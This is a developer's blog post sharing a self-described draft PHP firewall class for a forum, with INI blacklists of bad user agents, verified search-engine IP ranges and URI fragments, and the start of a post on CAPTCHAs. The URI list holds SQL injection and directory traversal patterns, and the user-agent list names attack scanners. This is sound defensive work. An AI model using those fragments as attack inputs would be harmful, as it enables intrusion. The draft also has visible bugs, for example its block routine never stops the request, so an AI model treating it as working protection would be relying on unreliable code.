Firewall.php

Since yesterday, I’ve been working on my forum script again (oh, you mean the one you’ve been working on since 2009?! Er… yes). The good news is that I’m finally getting somewhere. Bad news, I had to scrap everything I wrote so far since that turned out not to be the direction I wanted to go. The one sticking point was protecting the forum from all sorts of unsavory things the internet has an abundance of.

There all sorts of plugins and apps available to protect your software from spammers and things, but most of them are hardly drop-in caliber. I’ve looked at Akismet (which isn’t as transparent as I had hoped), Fail2ban (which was too involved) and Bad behavior. All in all, BB turned out to be the thing closest to what I was looking for, but it didn’t quite… match.

The premise behind Bad Behavior is that it’s a module/plugin or what-have-you, that sits listening to any requests to your site and piles through a blacklist of bad bots in the form of User Agent fragments and rubbish IP addresses. It optionally downloads blacklists and does host matching, but this aspect seems to be broken due to a PHP bug (surprise!). There’s also the problem of layout. BB seems a bit all-over-the-place as a piece of software. After scanning the code for a while, I realized it wasn’t really what I wanted or how I’d like to layout my forum.

I needed something that can be deeply integrated into the forum so that I’ll have the option of pushing requests to a log of some sort, like BB does, but I also wanted to block users based on user name in other portions of the site. This required that I hack into BB to work and, considering the differing approaches, that wasn’t going to work. There should be two sections to this: A main firewall script and a model. The model is a “firewall entry object” that I can save to a database. Optionally, I also wanted it to have username and other information in the future so I haven’t finished it yet.

So last night, I sat down and sketched out a few things into a class. This is a non functional draft for what might be a firewall script I can reuse elsewhere. You can think of this script as me thinking out loud.

There are many different ways to do this so I’ll be scrubbing this in the future. But for now, here’s the overview

Update: Well that was quick. This went from non-functional draft to semi-functional draft. I’ve also added a sketch of a FireEntry model which can show what would be saved if this was connected to a database. Also moved all the ‘lists’ to separate config files (‘Config/’ folder).

I haven’t had a chance to do a proper update yet since I’ve been extremely busy over the past month. As soon as few days are done, I’ll get back to more important things. I.E. Cabins!

<?php
/**
 * Bot and bad client blocking script (NON FUNCTIONAL DRAFT) 
 * This should NOT be considered foolproof as it uses a blacklist approach.
 * Parts of this code was inspired by the Bad Behavior plugin. No code was shared.
 *
 * @author Eksith Rodrigo <reksith at gmail.com>
 * @license http://opensource.org/licenses/ISC ISC License
 * @version 0.1
 */

class Firewall extends \Singleton {
	
	/**
	 * Message to return if a user is blocked
	 * Right now, it's identical to the router 'not found' message to avoid
	 * returning too much information.
	 */
	const DIE_MESSAGE = 'Couldn\'t find that';
	
	private static $botsIni = 'Config/verifiedbots.ini';
	
	private static $uasIni = 'Config/baduas.ini';
	
	private static $urisIni = 'Config/baduris.ini';
	
	
	/**
	 * @var object Firewall model object
	 */
	private $fire	= null;
	
	public $userhash = '';
	
	
	/**
	 * Forbidden request methods
	 */
	public static $rms = array(
		'trace', 'track', 'delete'
	);
	
	
	public static $searchEngines = array(
		'Google',
		'Bing',
		'Live',
		'MS Search',
		'MSN',
		'Inktomi',
		'Slurp',
		'SearchMonkey',
		'Yahoo',
		'Baidu',
		'Yandex'
	);
	
	/**
	 * Begin working as soon as the module is loaded.
	 * Starts from least expensive checks (IP) to most expensive (Headers)
	 */
	public function __construct() {
		$this->init();
		
		if ( empty( $this->fire->ip ) ) {
			$this->fire->ip		= $_SERVER['REMOTE_ADDR'];
			$this->fire->response	= 'Failed: Martian IP';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		$this->checkRequest();
		$this->checkURI();
		$this->checkHeaders();
		$this->verifiedBotScan();
		
	}
	
	private function init() {
		$this->fire		= new \Models\FireEntry();
		$this->fire->method	= 
			strtolower( $_SERVER['REQUEST_METHOD'] );
		
		$this->fire->uri	= $this->getURI();
		$this->fire->headers	= $this->headers();
		
		$this->fire->ua		= $_SERVER['HTTP_USER_AGENT'];
		$this->fire->protocol	= $_SERVER['SERVER_PROTOCOL'];
		$this->fire->reqtime	= isset( $_SERVER['REQUEST_TIME'] ) ?
						$_SERVER['REQUEST_TIME'] : 
						time();

		$this->fire->ip		= $this->getIP();
	}
	
	private function checkRequest() {
		if ( in_array( $this->fire->method, self::$rms ) ) {
			$this->fire->response = 'Failed: Request check';
			$this->killReq( self::DIE_MESSAGE );
		}
	}
	
	private function checkURI() {
		$uris =  parse_ini_file( self::$urisIni );
		
		foreach( $uris['u'] as $uri ) {
			if ( false === stripos( 
				$this->fire->uri, $uri ) ) {
				continue;
			} else {
				$this->fire->response = 'Failed: URI check';
				$this->killReq( self::DIE_MESSAGE );
				break;
			}
		}
	}
	
	private function checkHeaders() {
		$headers = $this->fire->headers;
		
		/**
		 * Accept missing. Not acceptable.
		 */
		if ( $this->missing( $headers, 'Accept' ) ) {
			$this->fire->response = 'Failed: Accept header missing';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		/**
		 * No UA or it's too short
		 */
		if ( $this->missing( $headers, 'User-Agent', 10 ) ) {
			$this->fire->response = 'Failed: User agent too small';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		/**
		 * Shouldn't see MSIE *and* Windows ME/XP/2000 in the same 
		 * UA string
		 */
		if ( 
			$this->has( $headers, 'User-Agent', '; MSIE' ) && (
			$this->has( $headers, 'User-Agent', 'Windows 2000' ) || 
			$this->has( $headers, 'User-Agent', 'Windows ME' ) || 
			$this->has( 
				$headers, 'User-Agent', 'Windows XP' ) 
			)
		) {
			$this->fire->response = 'Failed: Fake MSIE bot';
			$this->killReq( self::DIE_MESSAGE );
		}
		
		/**
		 * Check against blacklist of User agents.
		 * This is the most expensive operation and should be 
		 * reserved for last.
		 */
		$uas =  parse_ini_file( self::$uasIni );
		if ( $this->has( $headers, 'User-Agent', $uas['u'] ) ) {
			$this->fire->response = 'Failed: Bad User Agent';
			$this->killReq( self::DIE_MESSAGE );
		}
	}
	
	/**
	 * It's opposites day! This function returns *true* if a particular 
	 * header value is completely missing, contains an empty string or
	 * is below the minimum length
	 */
	private function missing( &$h, $k, $min = 0 ) {
		if ( array_key_exists( $k, $h ) ) {
			if ( empty( $h[$k] ) ) {
				return true;
			}
			if ( $min > 0 && mb_strlen( $h[$k] ) < $min ) {
				return true;
			}
			return false;
		}
		
		return true;
	}
	
	/**
	 * Helper to see if a key exists in an array, has a component
	 * to search in the value or matches to an optional regular expression
	 */
	private function has( &$h, $k, $v = null, $regex = false ) {
		$has = array_key_exists( $k, $h );
		
		/**
		 * Only checking for key existence
		 */
		if ( null === $v || !$has ) {
			return $has;
		}
		
		if ( is_array( $v ) ) {
			foreach( $v as $name ) {
				if ( false === stripos( $name, $h[$k] ) ) {
					continue;
				} else {
					return true;
				}
			}
			
			/**
			 * Made it this far. The key wasn't in the array
			 */
			 return false;
		}
		
		/**
		 * The key value should be a regular expression match
		 */
		if ( $regex ) {
			return preg_match('/\b'. $v .'\b/i', $h[$k] );
		}
		
		if ( false === stripos( $h[$k], $v ) ) {
			return false;
		}
		
		return $has;
	}
	
	private function uaInSearchBot() {
		foreach( self::$searchEngines as $bot ) {
			if ( false === strpos( $this->fire->ua, $bot ) ) {
				continue;
			} else {
				return $bot;
			}
		}
		return null;
	}
	
	/**
	 * Check bot UA against IPs that are known for it
	 */
	private function verifiedBotScan() {
		if ( !$this->uaInSearchBot() ) {
			return;
		}
		$out	= null;
		$ua	= $this->fire->ua;
		
		$var =  parse_ini_file( self::$botsIni, true );
		$bots	= array_keys( $var );
		
		foreach( $bots as $b ) {
			$bua = explode( '_', $b );
			foreach( $bua as $a ) {
				
				/**
				 * User agent didn't match any bot aliases
				 */
				if ( false === strpos( $ua, $a ) ) {
					continue;
				} else {
					
					/**
					 * User agent claims to be a known bot
					 */
					$out = $this->rangeScan( 
						$var[$b]['i']
					);
					break; // Bot checking done
				}
			}
			
			/**
			 * We have a result (anything other than null)
			 */
			if ( null !== $out ) { break; }
		}
		
		if ( null === $out ) {
			$this->fire->response = 'Passed';
			return;
		}
		
		/**
		 * Didn't pass bot scan
		 */
		$this->fire->response = 'Failed: Spoofed popular bot';
		$this->killReq( self::DIE_MESSAGE );
	}
	
	/**
	 * Checks a given IP range in CIDR format
	 */
	private function rangeScan( $ips = array() ) {
		$out = false;
		foreach( $ips as $ip ) {
			if ( $out = $this->cidr( $ip, $this->fire->ip ) ) {
				/**
				 * IP in the given list  Exit loop
				 */
				break;
			}
		}
		return $out;
	}
	
	
	/**
	 * This may fail... hard!
	 * 
	 * @returns Gets (or rather extrapolates) IPv4/6 address from 
	 * 		relevant headers
	 */
	private function getIP() {
		
		$vars = array(
			'HTTP_CLIENT_IP', 
			'HTTP_X_FORWARDED_FOR', 
			'HTTP_X_FORWARDED', 
			'HTTP_X_CLUSTER_CLIENT_IP', 
			'HTTP_FORWARDED_FOR', 
			'HTTP_FORWARDED', 
			'REMOTE_ADDR'
		);
		
		foreach( $vars as $v ) {
			
			if ( true === array_key_exists( $v, $_SERVER ) )  {
				
				$ip = explode( ',', $_SERVER[$v] );
				
				foreach( $ip as $test ) {
					$test = trim( $test );
					if ( $this->checkIP( $test ) ) {
						return $test;
					}
				}
			}
		}
		
		/**
		 * If we made it this far, the IP was invalid
		 */
		return '';
	}
	
	private function formatIP4( $ip, $pad = '0' ) {
		$ip	= str_replace( '*', $pad, $ip );
		$bits	= null;
		$p	= strpos( $ip, '/' );
		if ( false !== $p ) { 
			$bits	= substr( $ip, $p, strlen( $ip ) - 1 );
			$ip	= substr( $ip, 0, $p );
		}
		
		$sr	= explode( '.', $ip );
		while( count( $sr ) < 4) {
			$sr[] = $pad;
		}
		$ip	= implode('.', $sr );
		
		return $ip . $bits;
	}
	
	private function matchIP4StartToEnd( $start, &$end ) {
		if ( empty( $end ) ) {
			$end	= array();
			$d	= explode( '.', $start );
			$c	= count( $d );
			
			for( $i = 0; $i < $c; $i++ ) {
				if ( empty( $d[$i] ) ) {
					$end[$i] = '255';
				} else {
					$end[$i] = $d[i];
				}
			}
		} else {
			$end = str_replace( '*', '255', $end );
		}
		
		$end = $this->formatIP4( $end, '255' );
	}
	
	/**
	 * Checks if an IP is between an IPv4 range
	 */
	public function ip4Range( $start, $end, $ip ) {
		
		$start	= $this->formatIP4( $start, '0' );
		
		/**
		 * Bits E.G.'/16' was present. Send to CIDR validation
		 */
		if ( false !== strpos( $start, '/' ) ) {
			return $this->cidr( $start, $ip );
		}
		
		$this->matchIP4StartToEnd( $start, $end );
		
		$start	= ip2long( $start );
		$ip	= ip2long( $ip );
		$end	= ip2long( $end );
		
		if ( $start <= $ip && $end >= $ip ) {
			return true;
		}
		
		return false;
	}
	
	
	/**
	 * TODO: Create IPv6 matching
	 */
	private function ip6Range( $start, $end, $ip ) {
		return false;
	}
	
	
	/**
	 * CIDR format IP matching
	 */
	private function cidr( $r, $ip ) {
		list( $sub, $bits ) = explode( '/', $r );
		
		$ip	= ip2long( $ip );
		$sub	= ip2long( $sub );
		$mask	= ( -1 << ( 32 - $bits ) );
		
		$sub	&= $mask; // Fix inconsistencies
		
		return ( $ip & $mask ) == $sub;
	}
	 
	 /**
	  * Converts an IP4 address to IP6.
	  * Convenient to store as a single format
	  */
	private function ip4Toip6( $ip ) {
		if ( filter_var( $ip, 
			FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) ) {
			return cleanIPv6( $ip ); // Already IPv6
		}
		
		$ia = array_pad( explode( '.', $ip ), 4, 0 );
		$b1 = base_convert( ($ia[0] * 256 ) + $ia[1], 10, 16 );
		$b2 = base_convert( ($ia[2] * 256 ) + $ia[3], 10, 16 );
		
		return "0000:0000:ffff:$b1:$b2";
	}
	 
	 /**
	  * Expand IPv6 to proper storage
	  * 
	  * @link http://php.net/manual/en/function.inet-pton.php
	  */
	private function cleanIPv6( $ip ) {
		$h	= unpack( "H*hex", inet_pton( $ip ) );
		$ip	= preg_replace( '/([A-f0-9]{4})/', "$1:", $hex['hex'] );
		
		return substr( $ip , 0, -1 );
	}
	
	
	/**
	 * Checks for martians E.G. 10.0.0.0/8
	 * These should really be blocked at the router/switch
	 */
	private function checkIP( $ip ) {
		return filter_var( $ip, FILTER_VALIDATE_IP, 
			FILTER_FLAG_NO_RES_RANGE | FILTER_FLAG_NO_PRIV_RANGE );
	}
	
	private function killReq( $msg ) {
		$this->logReq();
		//echo $this->fire->response;
	}
	
	private function logReq() {
		$this->fire->save();
	}
	
	private function headers() {
		if ( function_exists( 'getallheaders' ) ) {
			return getallheaders();
		}
		
		$headers = array();
		
		foreach( $_SERVER as $k => $v ) {
			
			if ( 0 === strpos( $k, 'HTTP_' ) ) {
				
				/**
				 * Remove HTTP_ and turn turn '_' to spaces
				 */
				$hd	= substr( $k, 5 );
				$hd	= str_replace( '_', ' ', $hd );
				
				/**
				 * E.G. ACCEPT LANGUAGE to Accept-Language
				 */
				$uw	= ucwords( strtolower( $hd ) );
				$uw	= str_replace( ' ', '-', $uw );
				
				$headers[ $uw ] = $value; 
			}
		}
		
		return $headers;
	}
	
	private function getURI() {
		if ( isset( $_SERVER['REQUEST_URI'] ) ) {
			return $_SERVER['REQUEST_URI'];
		}
		
		$_SERVER['REQUEST_URI'] = substr( $_SERVER['PHP_SELF'], 1 );
		
		if ( isset($_SERVER['QUERY_STRING'] ) ) {
			$_SERVER['REQUEST_URI'] .= '?' . 
				$_SERVER['QUERY_STRING'];
		}
	}
}

The bad user agents ini file

; Partial (I.E. never ending) list of User Agents and partial matches
; Courtesy of the following:
; 
; http://bad-behavior.ioerror.us/
; https://github.com/bluedragonz/bad-bot-blocker/blob/master/.htaccess
; http://forum.joomla.org/viewtopic.php?t=494485
;
;Last count at 278 fragments checked


u[] = '**'
u[] = '\\\\'
u[] = '.NET CLR 1)'
u[] = '.NET CLR1'
u[] = '\r'
u[] = '<sc'
u[] = '; Widows'
u[] = '360Spider'
u[] = '8484 Boston Project'
u[] = 'a href='
u[] = 'Aboundex'
u[] = 'Acunetix'
u[] = 'adwords'
u[] = 'Alexibot'
u[] = 'AIBOT'
u[] = 'asterias'
u[] = 'attach'
u[] = 'autoemailspider'
u[] = 'BackDoorBot'
u[] = 'BackWeb'
u[] = 'Bad Behavior Test'
u[] = 'Bandit'
u[] = 'BatchFTP'
u[] = 'Bigfoot'
u[] = 'Black.Hole'
u[] = 'BlackHole'
u[] = 'BlackWidow'
u[] = 'blogsearchbot-martin'
u[] = 'BlowFish'
u[] = 'Bot mailto:craftbot@yahoo.com'
u[] = 'BotALot'
u[] = 'BrowserEmulator'
u[] = 'Buddy'
u[] = 'BuiltBotTough'
u[] = 'Bullseye'
u[] = 'BunnySlippers'
u[] = 'Cegbfeieh'
u[] = 'CheeseBot'
u[] = 'CherryPicker'
u[] = 'ChinaClaw'
u[] = 'Clearswift'
u[] = 'clipping'
u[] = 'Cogentbot'
u[] = 'Collector'
u[] = 'compatible ; MSIE'
u[] = 'compatible-'
u[] = 'CoralWebPrx'
u[] = 'core-project'
u[] = 'Copier'
u[] = 'CopyRightCheck'
u[] = 'cosmos'
u[] = 'Crescent'
u[] = 'Custo'
u[] = 'Diamond'
u[] = 'Digger'
u[] = 'DIIbot'
u[] = 'DISCo'
u[] = 'DittoSpyder'
u[] = 'discovery'
u[] = 'dragonfly'
u[] = 'Drip'
u[] = 'Download'
u[] = 'eCatch'
u[] = 'Easy'
u[] = 'Email'
u[] = 'Emulator'
u[] = 'Enchanc'
u[] = 'EroCrawler'
u[] = 'Exabot'
u[] = 'Express WebPictures'
u[] = 'Extrac'			; Extractors
u[] = 'EyeNetIE'
u[] = 'Fail'
u[] = 'Fatal'
u[] = 'FlashGet'
u[] = 'FHscan'
u[] = 'Firebird'		; Too old to be viable
u[] = 'flunky'
u[] = 'Foobot'
u[] = 'Forum Poster'
u[] = 'FrontPage'
u[] = 'Gecko/2525'
u[] = 'GetRight'
u[] = 'GetWeb!'
u[] = 'Go!Zilla'
u[] = 'Go-Ahead-Got-It'
u[] = 'gotit'
u[] = 'Grab'
u[] = 'Grafula'
u[] = 'grub'
u[] = 'hanzoweb'
u[] = 'Harvest'
u[] = 'Havij'
u[] = 'hloader'
u[] = 'HMView'
u[] = 'HttpProxy'
u[] = 'HTTrack'
u[] = 'humanlinks'
u[] = 'IlseBot'
u[] = 'Indy Library'
u[] = 'InfoNaviRobot'
u[] = 'InfoTekies'
u[] = 'Intelliseek'
u[] = 'InterGET'
u[] = 'Internet Explorer'	; *Not* IE. UA is likely a bot
u[] = 'Intraformant'
u[] = 'ISC Systems iRc'
u[] = 'Iria'
u[] = 'Java'
u[] = 'Jakarta'
u[] = 'Jenny'
u[] = 'JetCar'
u[] = 'JOC'
u[] = 'JustView'
u[] = 'Jyxobot'
u[] = 'Kenjin'
u[] = 'Keyword'
u[] = 'larbin'
u[] = 'Leacher'
u[] = 'LexiBot'
u[] = 'LeechFTP'
u[] = 'libwww-perl'
u[] = 'lftp'
u[] = 'libWeb/clsHTTP'
u[] = 'likse'
u[] = 'LinkScan'
u[] = 'LNSpiderguy'
u[] = 'LinkWalker'
u[] = 'Lobster'
u[] = 'Locator'
u[] = 'LWP'
u[] = 'Magnet'
u[] = 'Mag-Net'
u[] = 'MarkWatch'
u[] = 'Mata.Hari'		; Well, now I've seen everything
u[] = 'Memo'
u[] = 'Microsoft URL'
u[] = 'Microsoft.URL'
u[] = 'MIDown'
u[] = 'Ming Mong'
u[] = 'Missigua'
u[] = 'Mister'
u[] = 'MJ12bot/v1.0.8'
u[] = 'moget'
u[] = 'Morfeus'
u[] = 'Movable Type'		; Not the blog engine
u[] = 'Mozilla.*NEWT'
u[] = 'Mozilla/0'
u[] = 'Mozilla/1'
u[] = 'Mozilla/2'
u[] = 'Mozilla/3'
u[] = 'Mozilla/4.0('
u[] = 'Mozilla/4.0+(compatible;+'
u[] = 'Mozilla/4.0 (Hydra)'
u[] = 'MSIE 7.0;  Windows NT 5.2'
u[] = 'Murzillo'
u[] = 'MVAClient'
u[] = 'Navroad'
u[] = 'NearSite'
u[] = 'NetAnts'
u[] = 'NetMechanic'
u[] = 'NetSpider'
u[] = 'Net Vampire'
u[] = 'NetZIP'
u[] = 'Nessus'
u[] = 'NG'
u[] = 'NICErsPRO'
u[] = 'Nikto'
u[] = 'Ninja'
u[] = 'Nimble'
u[] = 'NPbot'
u[] = 'Nomad'
u[] = 'NutchCVS'
u[] = 'Nutscrape'
u[] = 'NextGen'
u[] = 'Octopus'
u[] = 'OmniExplorer'
u[] = 'Opera/9.64('
u[] = 'Offline'		 ; 'Offline' anything is a scraper
u[] = 'Openfind'
u[] = 'OutfoxBot'
u[] = 'Papa Foto'
u[] = 'pavuk'
u[] = 'pcBrowser'
u[] = 'Perman Surfer'
u[] = 'PHP'
u[] = 'Pockey'
u[] = 'PMAFind'
u[] = 'POE'
u[] = 'ProPowerBot'
u[] = 'psbot'
u[] = 'psycheclone'
u[] = 'Pump'
u[] = 'PussyCat'
u[] = 'PycURL'
u[] = 'Python-urllib'
u[] = 'QueryN'
u[] = 'RealDownload'
u[] = 'Reaper'
u[] = 'Recorder'
u[] = 'ReGet'
u[] = 'RepoMonkey'
u[] = 'RMA'
u[] = 'revolt'
u[] = 'Siphon'
u[] = 'SiteSnagger'
u[] = 'SlySearch'
u[] = 'SmartDownload'
u[] = 'Snake'
u[] = 'Snapbot'
u[] = 'sogou'
u[] = 'SpaceBison'
u[] = 'Spank'
u[] = 'spanner'
u[] = 'sqlmap'
u[] = 'Sqworm'
u[] = 'Stripper'
u[] = 'Sucker'
u[] = 'SuperBot'
u[] = 'Super Happy Fun'
u[] = 'SuperHTTP'
u[] = 'Surfbot'
u[] = 'suzuran'
u[] = 'Szukacz'
u[] = 'tAkeOut'
u[] = 'TightTwatBot'		; WTF?!
u[] = 'Titan'
u[] = 'Teleport'
u[] = 'Telesoft'
u[] = 'TrackBack'
u[] = 'True_Robot'
u[] = 'Turing Machine'
u[] = 'turingos'
u[] = 'TurnitinBot'
u[] = 'Ubuntu/9.25'
u[] = 'unspecified'
u[] = 'user'
u[] = 'User Agent:'
u[] = 'User-Agent:'
u[] = 'VoidEYE'
u[] = 'w3af'
u[] = 'Warning'
u[] = 'Web Image Collector'
u[] = 'WebaltBot'
u[] = 'WebAuto'
u[] = 'WebFetch'
u[] = 'WebGo'
u[] = 'WebmasterWorldForumBot'
u[] = 'WebSauger'
u[] = 'WebSite-X Suite'
u[] = 'Website eXtractor'
u[] = 'Website Quester'
u[] = 'Webster'
u[] = 'WebWhacker'
u[] = 'WebZIP'
u[] = 'Whacker'
u[] = 'Widow'
u[] = 'Winnie Poh'
u[] = 'Win95'			; These are too old. Likely bots
u[] = 'Win98'
u[] = 'WinME'
u[] = 'Win 9x 4.90'
u[] = 'Windows 3'
u[] = 'Windows 95'
u[] = 'Windows 98'
u[] = 'Windows NT 4'
u[] = 'Windows NT;'
u[] = 'Windows NT 5.0;)'
u[] = 'Windows NT 5.1;)'
u[] = 'Windows XP 5'
u[] = 'WISEbot'
u[] = 'WISENutbot'
u[] = 'Wordpress'		; Vulnerability scanner
u[] = 'WWWOFFLE'
u[] = 'Vacuum'
u[] = 'VCI'
u[] = 'Xaldon'
u[] = 'Xenu'
u[] = 'Zeus'
u[] = 'ZmEu'
u[] = 'Zyborg'

The verified search engines

; Whitelisted popular bots and corresponding IP addresses
; Note: This isn't exhaustive and will likely fail on a few 
; legitimate visits from these. This is mostly to prevent spoofers.
; 
; http://chceme.info/ips/
; http://www.webmasterworld.com/search_engine_spiders/4475767.htm
; http://www.internetofficer.com/web-robot/yahoo/

[Google]
i[] = '64.233.160.0/19'
i[] = '66.102.0.0/20' 
i[] = '66.249.64.0/19'
i[] = '72.14.192.0/18' 
i[] = '74.125.0.0/16' 
i[] = '209.85.128.0/17' 
i[] = '216.239.32.0/19'

[Bing_Live_MS Search_MSN]
i[] = '64.4.0.0/18'
i[] = '65.52.0.0/14'
i[] = '131.253.21.0/24'
i[] = '131.253.22.0/23'
i[] = '131.253.24.0/21'
i[] = '131.253.32.0/20'
i[] = '157.54.0.0/15'
i[] = '157.56.0.0/14'
i[] = '157.60.0.0/16'
i[] = '207.46.0.0/16'
i[] = '207.68.128.0/18'
i[] = '207.68.192.0/20'

[Inktomi_Slurp_SearchMonkey_Yahoo] 
i[] = '8.12.144.0/24'
i[] = '66.196.64.0/18'
i[] = '66.228.160.0/19'
i[] = '67.195.0.0/16'
i[] = '68.142.192.0/18'
i[] = '68.180.128.0/17'
i[] = '72.30.0.0/16'
i[] = '74.6.0.0/16'
i[] = '202.160.176.0/20'
i[] = '209.191.64.0/18'

[Baidu]
i[] = '61.135.190.1/32'		; CN...
i[] = '61.135.190.2/31'
i[] = '61.135.190.4/30'
i[] = '61.135.190.8/29'
i[] = '61.135.190.16/28'
i[] = '61.135.190.32/27'
i[] = '61.135.190.64/26'
i[] = '61.135.190.128/26'
i[] = '61.135.190.192/27'
i[] = '61.135.190.224/28'
i[] = '61.135.190.240/29'
i[] = '61.135.190.248/30'
i[] = '61.135.190.252/31'
i[] = '61.135.190.254/32'
i[] = '119.63.192.0/21'		; JP...
i[] = '119.63.192.128/26'
i[] = '119.63.192.192/27'
i[] = '119.63.192.224/28'
i[] = '119.63.192.240/29'
i[] = '119.63.192.248/30'
i[] = '119.63.192.252/31'
i[] = '119.63.192.254/32'
i[] = '119.63.193.0/24'
i[] = '119.63.196.1/32'
i[] = '119.63.196.2/31'
i[] = '119.63.196.4/30'
i[] = '119.63.196.8/29'
i[] = '119.63.196.16/28'
i[] = '119.63.196.32/27'
i[] = '119.63.196.64/26'
i[] = '119.63.198.0/24'
i[] = '119.63.199.103/32'
i[] = '123.125.64.0/18'		; CN...
i[] = '123.125.66.0/24'
i[] = '123.125.71.0/24'
i[] = '180.76.0.0/16'
i[] = '180.76.5.0/24'
i[] = '180.76.6.0/24'
i[] = '220.181.0.0/18'
i[] = '220.181.7.0/24'
i[] = '220.181.108.0/24'

[Yandex]
i[] = '77.88.0.0/18'
i[] = '77.88.22.0/23'
i[] = '77.88.24.0/21'
i[] = '77.88.24.0/22'
i[] = '77.88.28.0/22'
i[] = '77.88.36.0/23'
i[] = '77.88.42.0/23'
i[] = '77.88.44.0/24'
i[] = '77.88.50.0/23'
i[] = '87.250.224.0/19'
i[] = '87.250.230.0/23'
i[] = '87.250.252.0/22'
i[] = '93.158.128.0/18'
i[] = '93.158.137.0/24'
i[] = '93.158.144.0/21'
i[] = '93.158.144.0/23'
i[] = '93.158.146.0/23'
i[] = '93.158.148.0/22'
i[] = '95.108.128.0/17'
i[] = '95.108.128.0/24'
i[] = '95.108.152.0/22'
i[] = '95.108.216.0/23'
i[] = '95.108.240.0/21'
i[] = '95.108.248.0/23'
i[] = '178.154.128.0/17'
i[] = '178.154.160.0/22'
i[] = '178.154.164.0/23'
i[] = '199.36.240.0/22'
i[] = '213.180.192.0/19'
i[] = '213.180.204.0/24'
i[] = '213.180.206.0/23'
i[] = '213.180.209.0/24'
i[] = '213.180.218.0/23'
i[] = '213.180.220.0/23'

The ‘Bad URIs’

; URL fragments indicating possible SQL injection or 
; directory traversal attempts. Part of the matches from Bad Behavior
; 
; http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html


u[] = '0x31303235343830303536'
u[] = '../'
u[] = '..\\'
u[] = '..%2F'
u[] = '..%u2216'
u[] = '?=PHP'				; Attempt to reveal PHP version
u[] = '%60information_schema%60'
u[] = ';DECLARE%20@'
u[] = '%7e'
u[] = '%3cscript%20'
u[] = '%27%3b%20'
u[] = '%22http%3a%2f%2f'
u[] = '%255c'
u[] = '%%35c'
u[] = '%25%35%63'
u[] = '%c0%af'
u[] = '%c1%9c'
u[] = '%c1%pc'
u[] = '%c0%qf'
u[] = '%c1%8s'
u[] = '%c1%1c'
u[] = '%c1%af'
u[] = '%e0%80%af'
u[] = '%u'
u[] = '+%2F*%21'
u[] = '%27--'
u[] = '%27 --'
u[] = '%27%23'
u[] = '%27 %23'
u[] = 'benchmark%28'
u[] = 'insert+into+'
u[] = 'r3dm0v3'
u[] = 'select+1+from'
u[] = 'union+all+select'
u[] = 'union+select'
u[] = 'waitfor+delay+'
u[] = 'w00tw00t'

And, finally, a ‘FireEntry’ example model. This can show what variables would be saved to the db.

<?php


namespace Models;

class FireEntry extends base {
	
	/**
	 * @var string Assigned label (not UA, but what the firewall determined)
	 */
	public $label	= 'unknown';
	
	
	/**
	 * @var string Request method
	 */
	public $method	= '';
	
	
	/**
	 * @var string Accessed URI
	 */
	public $uri	= '';
	
	
	
	/**
	 * @var string Accessing IP
	 */
	public $ip	= '';
	
	
	
	/**
	 * @var string User Agent string
	 */
	public $ua	= '';
	
	
	
	/**
	 * @var string Complete header string
	 */
	public $headers	= '';
	
	
	
	/**
	 * @var string Requested server protocol
	 */
	public $protocol = '';
	
	
	
	/**
	 * @var string Firewall action (blocked, passed etc...)
	 */
	public $response = '';
	
	
	
	/**
	 * @var string Time the request was received
	 */
	public $reqtime = '';
	
	
	public function __construct( array $data = null ) {
		
		if ( empty( $data ) ) {
			return;
		}
		
		foreach ( $data as $field => $value ) {
			$this->$field = $value;
		}
	}
	
	
	public function save() {
		$time	= parent::_myTime( time() );
		$row	= 0;
		
		$headers='';
		if ( !empty( $this->headers ) ) {
			
		}
		if ( empty( $this->reqtime ) ) {
			$this->reqtime = $time;
		} else {
			$this->reqtime = parent::_myTime( $this->reqtime );
		}
		
		$params = array(
			'label'		=> $this->label,
			'method'	=> $this->method,
			'uri'		=> $this->uri,
			'ip'		=> $this->ip,
			'ua'		=> $this->ua,
			'headers'	=> $headers,
			'protocol'	=> $this->protocol,
			'reqtime'	=> $this->reqtime,
			'updated_at'	=> $time
		);
		
		var_dump( $params );
		//parent::put( 'firewall', $params );
	}
	
	
	
	public static function find( $filter = array() ) {
		// TODO: Filter
		
	}
	
	
	public static function gc( $exp ) {
		$sql	= "DELETE FROM firewall WHERE ( created_at < : exp);";
		$param	= array( 'exp' => $exp );
		
		parent::init();
		parent::$db->prepare( $sql );
		parent::$db->execute( $param );	
	}
	
	
	private static function filterConfig( &$filter = array() ) {
		$filter['limit']	= isset( $filter['limit'] ) ? $filter['limit'] : 10;
		$filter['page']		= isset( $filter['page'] ) ? $filter['page'] : 1;
		$filter['search']	= isset( $filter['search'] ) ? 
						$filter['search'] : '';
		
		$filter['offset']	= parent::_offset( 
						$filter['page'] , 
						$filter['limit']
					);
	}
}
Advertisement

Rendering a CAPTCHA image in PHP

It’s been a while since I posted anything web or programming related (I honestly don’t even the remember the last time) so I thought I’d post an update with something asked in an email by a friend. He was putting together a something which I’ve been asked to co-write and we came across the CAPTCHA issue again. We’re thinking of using these in a somewhat different way.

What they don’t tell you about CAPTCHA

They’re, more often than not, completely ineffective. The whole point about trying to prevent bots is only relevant when talking about simple drive-by spammers forum flooding or the like, but for anything more than that, you’re better off finding something else.

What they ARE useful for is to make sure only people who really have something to say end up voicing their opinion. I.E. It’s a think-before-you-speak buffer in many ways. This is especially helpful when you have anonymous posting enabled.

I’ve seen tons of examples of how to generate CAPTCHAs, but many of these (especially for PHP) are depending either on an existing image background or are so unreadable, they are not only bot proof they’re human proof. Worse yet, I’ve seen examples longer than one page of code. And I’m not even talking about session handling.

How someone writes something as simple as a CAPTCHA render in longer than a couple of functions is beyond me. OK, that’s just me being lazy, but to a programmer, laziness is a virtue sometimes.

Here’s another thing they don’t tell you about CAPTCHAs: Anything over 3 characters is useless. If they’ve managed to use OCR to break 3 characters, they’ve got the rest, your efforts will only frustrate legitimate users. Using 4 characters is a bit excessive, 5 and you’re getting on my nerves. 6 Is ridiculous and with any more, chances are, I’d rather not participate in whatever it is you have behind your unreadable gibberish.

Another thing a lot of these CAPTCHAs seem to overlook is the character pool. In some of these things, I’ve seen s that looks like 5, u that looks like v. Don’t even get me started on 0, o, 1, i, and j. Best option in this case is to get rid of these similar looking characters. In fact, you’re better off getting rid of most characters that even remotely have the ability to be confused with another letter. This is why I’m leaving out e as well, since that’s too easily confused with ‘c’ sometimes.

Here’s a sample of a CAPTCHA that hopefully doesn’t suck.

You should at least be able to read the bloody thing.

